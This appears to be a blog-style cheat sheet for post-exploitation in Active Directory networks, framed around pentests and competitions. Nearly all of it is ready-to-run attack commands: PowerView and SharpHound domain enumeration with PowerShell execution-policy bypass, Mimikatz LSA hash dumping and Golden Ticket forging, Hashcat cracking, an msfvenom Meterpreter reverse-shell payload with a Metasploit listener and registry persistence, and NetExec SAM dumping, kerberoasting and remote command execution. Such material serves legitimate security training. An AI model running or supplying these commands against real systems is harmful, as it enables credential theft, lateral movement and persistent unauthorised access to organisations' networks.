After getting the foot in the door in a pentesting scenario or competition it is time for gathering more data and credentials and creating persistence:
- PowerView – Enumerating the domain.
- SharpHound – Hammering that DC to extract all available data.
- BloodHound – Analysing the extracted data from the domain.
- Mimikatz – Dumping hashes.
- Hashcat – Cracking the dumped hashes.
- Golden Ticket – Getting access to other machines.
- Msfvenom – Crafting a payload.
- Metasploit – Getting the reverse shell and creating persistence.
- NetExec – Exploration and exploitation framework.
Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]:
cmd powershell -ep bypass . .\PATH\PowerView.ps1
Enumerate Domain Users
Get-NetUser | select cn
Enumerate Computers
Get-NetComputer -fulldata | select operatingsystem
Enumerate Groups
Get-NetGroup -GroupName *admin*
Enumerate Shares
Invoke-ShareFinder
Extract the loot from any computer joined to the domain with SharpHound script:
powershell -ep bypass . .\PATH\SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip
Copy the file over to the attacker’s machine.
Explore the domain with BloodHound Community Edition [Link].
Installing the tool on the attacker machine:
sudo apt update && sudo apt install docker.io docker-compose -y curl -L https://ghst.ly/getbhce | sudo docker compose -f - up sudo docker-compose logs bloodhound | grep 'Password'
Navigate to http://localhost:8080/ and log in with the acquired password for the user Admin (change it!)
Search for import/ingest and provide .zip or the extracted .json files.
After some time the data will be ready for queries in the Explore tab.
Dumping hashes with Mimikatz:
mimikatz.exe privilege::debug lsadump::lsa /patch
Chacking the dumped hashes with HashCat:
hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt
Creating a Golden Ticket with Mimikatz:
lsadump::lsa /inject /name:userName kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /userName:5508500012cc005cf7082a9a89ebdfdf /id:500 misc::cmd
Getting access to other machines with the Golden Ticket on the newly open window:
dir \\ComputerA\c$
CREATING PERSISTENCE
Crafting a payload with Msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.99 LPORT=4444 -f exe -o shell.exe
On the attacker side start a listener with Metasploit – Module Library available at [Link]:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp run background
Applying persistence to the granted session with Persistent Registry Startup Payload Installer:
use exploit/windows/local/persistence sessions set session 1
See also exploit/windows/local/persistence_service for Persistent Service Installer.
EXPLORING NETWORK WITH NETEXEC
NetExec is a network service exploitation tool used for pentesters [Link].
sudo apt install pipx git pipx ensurepath pipx install git+https://github.com/Pennyw0rth/NetExec
Basic commands:
nxc smb 10.0.0.0/24 nxc smb 10.0.0.0/24 -u '' -p '' --users nxc smb 10.0.0.0/24 -u 'guest' -p '' --users nxc smb 10.0.0.0/24 -u 'guest' -p '' --shares nxc smb 10.0.0.10 -u 'user' -p 'pass' --sam nxc smb 10.0.0.10 -u 'user' -p 'pass' --loggedon-users nxc smb 10.0.0.10 -u 'user' -p 'pass' -M schtask_as -o USER=Administrator nxc smb 10.0.0.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True nxc mssql 10.0.0.10 -u user' -p 'pass' nxc ldap 10.0.0.10 -u 'user' -p 'pass' --bloodhound --collection All nxc ldap 10.0.0.10 -u 'user' -p 'pass' --kerberoast file.txt nxc winrm 10.0.0.10 -u 'user' -p 'pass' -X 'whomai'